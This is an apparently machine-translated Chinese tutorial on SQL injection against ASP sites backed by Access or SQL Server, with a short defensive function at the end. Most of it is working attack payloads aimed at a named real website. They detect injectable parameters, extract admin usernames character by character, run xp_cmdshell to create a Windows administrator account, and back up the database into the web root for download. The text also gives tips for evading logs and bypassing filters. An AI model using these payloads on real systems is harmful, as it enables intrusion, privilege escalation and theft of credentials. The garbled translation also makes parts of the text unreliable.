Full access to SQL Injection Vulnerability-Introductory article

With the development of B/s pattern application development, more and more programmers use this model to write applications. However, due to the lack of entry threshold in this industry, the level and experience of programmers is also uneven, a large part of the programmer in writing code, the user does not judge the legality of input data, so that the application has a security risk. The user can submit a database query code, according to the results returned by the program, to obtain some of the data he wants to know, this is called SQL injection, that is, SQL injection.

SQL injection is accessed from the normal WWW port, and the surface seems to be no different from the general Web page access, so the current firewall in the market does not alert SQL injection, if the administrator does not view the IIS log habits, may be invaded for a long time will not be detected.

However, the approach of SQL injection is quite flexible, and there are many unexpected situations when injected. Can analyze according to the specific situation, constructs the ingenious SQL statement, thus obtains the desired data successfully, is the master and "rookie" the fundamental difference.

According to national conditions, the domestic website with asp+access or SQL Server accounted for more than 70%, php+mysq accounted for l20%, the other less than 10%. In this article, we from the sub-entry, advanced to high-level to explain the ASP injection methods and techniques, PHP injection of the article by the NB Alliance, another friend Zwell wrote, hoping to be useful to security workers and programmers. Learn about ASP injection Friends also do not skip the introductory article, because some people to inject the basic judgment method still has the misunderstanding. Are you ready for the job? Let ' s Go ...

Introductory article

If you haven't tried SQL injection before, then the first step is to get the IE Menu + tool =>internet option = + advanced + Show friendly HTTP error message before the tick is removed. Otherwise, IE will only appear as an HTTP 500 server error, and no more prompts will be available, regardless of what error the server returns.

The first section, SQL injection principle

Here we start from a website www.19cn.com (note: This article has been issued before the site owners agree, most of the real data).

On the homepage of the website, a link named "IE Cannot open a new window", the address is: http://www.19cn.com/showdetail.asp?id=49, we add the single quotation mark after this address, the server will return the following error message:

Microsoft JET Database Engine error ' 80040e14 '
The syntax error of the string is in the query expression ' id=49 '.
/showdetail.asp, line 8

From this error note we can see the following points:

1. The Web site uses an Access database that connects to the database through the jet engine, rather than through ODBC.
2. The program does not determine whether the data submitted by the client conforms to the program requirements.
3. The SQL statement has an ID field in the table queried.

From the above example we can know that the principle of SQL injection is to submit special code from the client, so as to collect the information of the program and the server, so as to get the information you think of.

Section II, determine if SQL injection is possible

After reading the first section, some people will think: I also often such tests can inject, this is not very simple? In fact, this is not the best way, why?

First of all, not necessarily each server's IIS return specific error prompts to the client, if the program is added CInt (parameters) such as statements, SQL injection will not be successful, but the server will also error, the specific information for processing the URL when the server error. Please contact your system administrator.

Secondly, some programmers who have a little knowledge of SQL injection think that it is safe to filter out single quotes, which is not a minority, and if you test with single quotes, you can't measure the injection point.

So, what kind of test method is more accurate? The answers are as follows:

①http://www.19cn.com/showdetail.asp?id=49
②http://www.19cn.com/showdetail.asp?id=49 and 1=1
③http://www.19cn.com/showdetail.asp?id=49 and 1=2

This is the classic 1=1, 1=2 test method, how to judge it? Take a look at the above three URLs and return the results:

The performance that can be injected:

① Normal display (this is necessary, otherwise the program is wrong)
② normal display, the content is basically the same as ①
③ prompts BOF or EOF (when the program does not make any judgments), or prompts for no record (when the rs.eof is judged), or the display content is empty (the program added on Error Resume Next)

Not injected is easier to judge, ① also normal display, ② and ③ generally have program-defined error prompts, or prompt type conversion error.

Of course, this is only used when the parameter is a digital type of judgment, the actual application will have character and search parameters, I will be in the intermediate "SQL injection general steps" to do the analysis.

Section III, judging database types and injection methods

There are differences in the functions and injection methods of different databases, so before we inject, we have to determine the type of database. The most commonly used database for ASP is access and SQL Server, which is one of more than 99% Web sites.

How do you get the program to tell you what database it uses? Take a look at:

SQL Server has some system variables that can be obtained directly from the error message if it is not turned off by the servers IIS prompt, and if it returns an error prompt, the method is as follows:

Http://www.19cn.com/showdetail.asp?id=49 and User>0

This sentence is simple, but contains the essence of SQL Server specific injection method, I myself also found in an unintentional test of this highly efficient method of guessing. Let me see what it means: first, the preceding statement is normal, with emphasis on and user>0, we know that user is a built-in variable for SQL Server whose value is the user name of the current connection, and the type is nvarchar. Take a nvarchar value compared with the number of int 0, the system will first try to convert the value of nvarchar to int, of course, the process will certainly be wrong, SQL Server error prompt is: The nvarchar value "ABC" Conversion data type int Syntax error occurred in the column, hehe, ABC is the value of the variable user, so that the Chuihuizhili will get the database user name. In a later space, you will see a lot of statements in this way.

By the way, as we all know, SQL Server user SA is a role equivalent to adminstrators permissions, get SA permissions, almost certainly can get the host's administrator. The above method can be very convenient to test whether it is logged in with SA, note that: if it is the sa login, the hint is "dbo" to convert the column to an int error, not "sa".

If server IIS does not allow you to return an error message, how do you determine the database type? We can start with access and SQL Server, and both access and SQL Server have their own system tables, such as tables that hold all the objects in the database, access is in the system table [msysobjects], but reading the table in a Web environment prompts " No permissions ", SQL Server is in table [sysobjects] and can be read normally in a Web environment.

Use the following statement in case you confirm that you can inject:

http://www.19cn.com/showdetail.asp?id=49 and (select COUNT (*) from sysobjects) >0
http://www.19cn.com/showdetail.asp?id=49 and (select COUNT (*) from msysobjects) >0

If the database is SQL Server, then the first URL of the page and the original page http://www.19cn.com/showdetail.asp?id=49 is roughly the same, and the second URL, because the table msysobjects is not found, will prompt an error, Even if the program has fault-tolerant processing, the page is completely different from the original page.

If the database uses access, then the situation is different, the first URL of the page and the original page, the second URL, depending on whether the database settings are allowed to read the system table, generally not allowed, so the original URL is completely different. In most cases, the first URL will tell you the type of database used by the system, and the second URL should be used only as a validation when the IIS error prompt is turned on.

General steps for the first section, SQL injection

First, judge the environment, look for injection points, determine the database type, which is already mentioned in the introductory article.

Secondly, according to the type of injection parameters, in the mind to reconstruct the original SQL statement, according to the parameter types are mainly divided into the following three kinds:

(A) The parameters of this type of id=49 are numeric, and the SQL statements are roughly as follows:
Select * from table name where field =49
The injected parameter is id=49 and [query condition], which is the generated statement:
Select * from table name where field =49 and [query condition]

(B) The parameters of this type of injection in the Class= series are character-based and the original SQL statement is roughly as follows:
Select * from table name where field = ' soap opera '
The injected parameter is the class= series ' and [Query condition] and ' ' = ', which is the generated statement:
Select * from table name where field = ' Serial ' and [query condition] and ' ' = '

(C) When searching without filtering parameters, such as the keyword= keyword, the original SQL statement is as follows:
Select * from table name where field like '% keyword% '
The injected parameter is keyword= ' and [query condition] and '%25 ' = ', which is the generated statement:
Select * from table name where field like '% ' and [query condition] and '% ' = '% '

Next, replace the query condition with the SQL statement, and guess the table name, for example:

Id=49 and (Select Count (*) from Admin) >=0

If the page is the same as the id=49, the additional condition is established, that is, the table admin exists, and conversely, that does not exist (remember this method). This loops until the table name is guessed.

After the table name is guessed, COUNT (*) is replaced with count (field name) and the same principle is used to guess the field name.

Some people will say: There are some accidental ingredients, if the table name is very complicated and irregular, then there is no play at all. That's right, there's no world at all. 100% successful hacker technology, flies do not bite seamless eggs, no matter how many technical and advanced hackers, are because other people's program is not strict or the user's sense of secrecy is not enough to start.

A bit off the topic, and then, for SQL Server library, there is still a way to let the program tell us the table name and field names, we will do in the high-level article is introduced.

Finally, after the table and column names have been successfully guessed, then use the SQL statement to get the value of the field, the following is a most common method-ascii verbatim decoding method, although this method is very slow, but it is certainly a feasible method.

For example, we know that the username field exists in the table admin, first we take the first record and test the length:

Http://www.19cn.com/showdetail.asp?id=49 and (select top 1 len (username) from Admin) >0

First explain the principle: if the top 1 username length is greater than 0, then the condition is set up, then >1, >2, >3 This test, until the condition is not established, such as >7, >8 is not established, is Len (username) =8

Of course no one will be stupid from the 0,1,2,3 test, how to compare quickly see their own play. After getting the length of the username, use mid (username,n,1) to intercept the nth character, and then ASC (Mid (username,n,1)) to get the ASCII code, such as:

Id=49 and (select top 1 ASC (Mid (username,1,1)) from Admin) >0

The same is also used to reduce the scope of the 1th-digit ASCII code, note that the ASCII code in English and digital between 1-128, you can use the binary method to speed up the guess, if written as a program test, the efficiency will be greatly improved.

Section two, SQL injection common functions

People with the foundation of SQL language have a much higher success rate in SQL injection than unfamiliar people. We need to improve our own SQL level, especially some commonly used functions and commands.

ACCESS:ASC (character) Sqlserver:unicode (character)
Function: Returns the ASCII code of a character

ACCESS:CHR (digital) Sqlserver:nchar (digital)
function: Contrary to ASC, returns characters based on ASCII code

Access:mid (String, n,l) sqlserver:substring (string, n,l)
Function: Returns a substring of length l from n characters, that is, a string between N and N+l

ACCESS:ABC (digital) sqlserver:abc (digital)
Function: Returns the absolute value of a number (used when guessing Chinese characters)

Access:a between B and C sqlserver:a between B and C
Function: Determine whether a is bounded between B and C

Section III, Chinese processing methods

It is common to encounter Chinese characters in injection, and some people want to quit when they encounter Chinese characters. In fact, as long as the Chinese language coding some understanding, "Chinese phobia" can be overcome quickly.

Let's start by saying something common:

In Access, the ASCII code of the Chinese may appear negative numbers, after removing the negative number with ABS () absolute value, Chinese characters are unchanged.

In SQL Server, ASCII is positive in Chinese, but because it is Unicode double-digit encoding, ASCII code cannot be obtained with function ASCII (), Unicode values must be returned with the function Unicode (), and the corresponding Chinese characters are obtained with the nchar function.

After reading the introductory and advanced articles, a little practice, crack the general website is no problem. But how can you increase the success rate of injection if you don't guess the name of the list, or if the program author filters some special characters? How to improve the efficiency of the guessing solution? Please continue to read the advanced article.

Section I, using system tables to inject SQL Server database

SQL Server is a powerful database system, and the operating system is also closely linked, which brings great convenience to developers, but on the other hand, but also provides a springboard for the injector, we first look at a few specific examples:

①http://site/url.asp?id=1;exec Master. xp_cmdshell "NET user name Password/add"--

A semicolon, in SQL Server, represents the separation of the two statements before and after--indicating that the following statement is a comment, so this statement in SQL Server will be divided into two sentences, first select out Id=1 records, and then execute the stored procedure xp_cmdshell, This stored procedure is used to invoke the system command, and the Net command creates a new account for Windows with the username name, password password, and then:

②http://site/url.asp?id=1;exec Master. xp_cmdshell "net localgroup name Administrators/add"--

Add the new account name to the Admin group, not two minutes, you've got the highest system privileges! Of course, this method only applies to the case where the SA is connected to the database, otherwise, there is no permission to call xp_cmdshell.

③http://site/url.asp?id=1;; and db_name () >0

There is a similar example in front of and user>0, the function is to get the connection user name, Db_name () is another system variable, which returns the database name of the connection.

④http://site/url.asp?id=1;backup database name to disk= ' c:\inetpub\wwwroot\1.db ';--

This is quite a trick, from the ③ get the database name, plus some IIS error exposed the absolute path, the database back to the Web directory, and then use HTTP to complete the entire database after the full download, all the administrator and user password are visible! When you do not know the absolute path, you can also back up to the network address method (such as \\202.96.xx.xx\Share\1.db), but the success rate is not high.

⑤http://site/url.asp?id=1;; and (Select Top 1 name from sysobjects where xtype= ' U ' and status>0) >0

As I said earlier, sysobjects is a system table for SQL Server that stores all the table names, views, constraints, and other objects, xtype= ' U ' and status>0, which represents the user-created table name, the statement above takes the first table name out, and the size of the 0 comparison, Let the error message reveal the name of the table. Second, third table name how to get? or leave it to our smart readers to think about it.

⑥http://site/url.asp?id=1;; and (Select Top 1 col_name (object_id (' table name '), 1) from sysobjects) >0

After getting the table name from ⑤, use object_id (' table name ') to get the internal id,col_name (table name id,1) corresponding to the table name, representing the 1th field name of the table, converting 1 to 2,3,4 ... you can get the name of the field in the table of the Solver one by one.

The above 6 points is my study of SQL Server injected more than half a year of painstaking crystallization, it can be seen that the level of understanding of SQL Server directly affects the success rate and the speed of guessing. After I studied SQL Server injection, I have greatly improved the level of development, hehe, maybe Security and development are complementary.

Section II, bypassing program restrictions continue to inject

In the introductory article, there are a lot of people like to use the ' Number test injection vulnerability, so there are many people using the filter ' method to "prevent" injection of the vulnerability, which may be able to block some of the novice attacks, but the more familiar with SQL injection, or can use the relevant functions, to bypass the program restrictions.

In the "General Steps to SQL Injection" section, the statements that I use are optimized so that they do not contain single quotes, and in the "inject SQL Server database with system tables", some of the statements contain the ' number ', and we take an example to see how to transform these statements:

Simple as where xtype= ' U ', the ASCII code corresponding to the character U is 85, so you can use where Xtype=char (85) Instead, if the character is in Chinese, such as where name= ' user ', you can use where Name=nchar ( 29992) +nchar (25143) instead.

Section III, Summary of experiences

1. Some people will filter select, Update, delete these keywords, but forget the case-sensitive, so you can use Select to try it.

2. When you can't guess the field name, you might want to look at the login form on the site, generally for convenience, the field name is the same as the form's input box.

3. Special note: The Address bar of the + number is interpreted as a space after the program,%2B interpreted as the + number,%25 interpreted as the% number, can refer to the UrlEncode of the relevant introduction.

4. When injected with the Get method, IIS logs all of your commit strings and does not log the Post method, so you can use the Post URL as much as possible without get.

5. Guess access can only use ASCII verbatim decoding method, SQL Server can also use this method, only need the difference between the two, but if you can use SQL Server error information to expose the value, the efficiency and accuracy will be greatly improved.

Precautionary approach

SQL injection vulnerability is "dikes, yixue", the vulnerability is very common on the Internet, usually because the programmer is not aware of the injection, or the program is not strict filtering, or a parameter forgot to check the result. Here, I give you a function, instead of the request function in ASP, you can inject say NO into all SQL, the function is as follows:

Function Saferequest (Paraname,paratype)
'---incoming parameters---
' Paraname: Parameter name-character type
' Paratype: Parameter Type-number type (1 means the above parameter is a number, 0 means the above parameter is a character)

Dim Paravalue
Paravalue=request (Paraname)
If Paratype=1 Then
If paravalue= "" or Not IsNumeric (Paravalue) Then
Response.Write "Parameters" & Paraname & "must be a digital type!" "
Response.End
End if
Else
Paravalue=replace (Paravalue, "'", "" ")
End if
Saferequest=paravalue
End function

The article ends here, whether you are a security officer, a technology enthusiast or a programmer, I hope this article will help you.

Full access to SQL Injection Vulnerability-Introductory article